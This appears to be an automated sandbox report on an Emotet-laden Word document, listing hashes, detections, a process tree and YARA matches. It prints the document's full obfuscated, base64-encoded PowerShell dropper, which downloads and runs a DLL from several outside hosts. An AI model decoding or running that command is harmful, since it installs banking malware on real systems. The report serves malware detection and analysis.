Play interactive tour

Edit tour

Analysis Report dat_513543.doc

Overview

General Information

Sample Name:	dat_513543.doc
Analysis ID:	336623
MD5:	10ee2b89f3480381986269c71e7e19cd
SHA1:	462fdbfb243ee2285f5c0fa3472915fd509a3fe7
SHA256:	ac71b73f7ed0aada10d4eb9c288fc3af470cb7ea49955cd25d66997c5fd1e3c4
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 1776 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2436 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2512 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 1692 cmdline: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2564 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 1204 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2828 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmjhjl\dvgjre.ish',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfafpdt\kkujpl.inf',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2808 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Stxynijtatjphar\aakvwlgscnjram.hbh',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2884 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oumozqnkirxudf\mcchvdsvabpvx.nrv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2444 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ailact\ivkbd.qrm',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2472 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Akjjgl\zoljk.jdx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2804 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Liisdspzre\vtsbueurz.syo',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3024 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uwcxnjiedvybvto\cwmcmgelygpijt.aui',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2111593595.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2102145547.0000000000246000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f10:$s1: POwersheLL
0000000D.00000002.2113623618.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2108402593.0000000000210000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2102389615.0000000001CE6000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x890:$s1: POwersheLL
00000007.00000002.2104218731.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2115470379.00000000006D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2109758118.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2107419696.00000000003D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2345304717.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2105708709.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
15.2.rundll32.exe.250000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.250000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.220000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.6d0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.3d0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.250000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.470000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1b0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.3d0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.210000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.270000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.220000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.210000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.6d0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.6f0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
